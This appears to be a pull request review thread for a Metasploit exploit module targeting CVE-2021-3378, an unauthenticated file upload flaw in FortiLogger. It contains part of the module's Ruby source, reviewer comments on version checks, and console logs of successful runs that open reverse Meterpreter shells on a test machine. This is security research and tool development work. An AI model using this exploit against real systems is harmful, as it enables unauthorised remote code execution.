modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FortiLogger Arbitrary File Upload Exploit',
+        'Description' => %q{
+          This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version 4.4.2.2 in
+          Windows 10 Enterprise.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
+          ],
+        'References' =>
+          [
+            ['CVE', '2021-3378'],
+            ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
+          ],
+
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'FortiLogger - 4.4.2.2',
+              {
+                'Platform' => 'win'
+              }
+            ],
+          ],
+        'DisclosureDate' => '2021-02-26',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
+      ], self.class
+    )
+  end
+
+  def check_product_info
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
+      'method' => 'POST',
+      'data' => '',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'Accept-Encoding' => 'gzip, deflate',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
+  end
+
+  def check
+    begin
+      res = check_product_info
+      if res && res.code == 200
+        if JSON.parse(res.body)['Version'] == '4.4.2.2'
```

Comment:
It might be worth using `<` if older version are vulnerable as well.

Reply:
Version comparison can be performed with `Rex::Version` (formerly `Gem::Version`).

```ruby
Rex::Version.new(version) <= Rex::Version.new('4.4.2.2')
```

Reply:
Hi, You're right. The vendor has 2 more old versions for download. I tested these versions and they have same vulnerability. So, version comparison part will be nice as you mentioned. 

```
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Target Version: 3.6.2.9
[+] The target is vulnerable.
[+] Generate Payload !
[+] Payload has been uploaded !
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.46
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.46:40455) at 2021-03-01 23:44:47 +0300

meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > sysinfo
Computer        : DESKTOP-QFNKFIO
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-QFNKFIO\brkn
meterpreter > 



-------------------------


msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > run

[*] Started reverse TCP handler on 192.168.1.46:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Target Version: 3.4.1.7
[+] The target is vulnerable.
[+] Generate Payload !
[+] Payload has been uploaded !
[*] Executing payload...
[*] Sending stage (175174 bytes) to 192.168.1.46
[*] Meterpreter session 2 opened (192.168.1.46:4444 -> 192.168.1.46:43699) at 2021-03-02 00:01:05 +0300

meterpreter > pwd
C:\Program Files\RZK\Fortilogger\App
meterpreter > getuid
Server username: DESKTOP-QFNKFIO\brkn
meterpreter > sysinfo
Computer        : DESKTOP-QFNKFIO
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```

I'm working on refactoring. Thanks.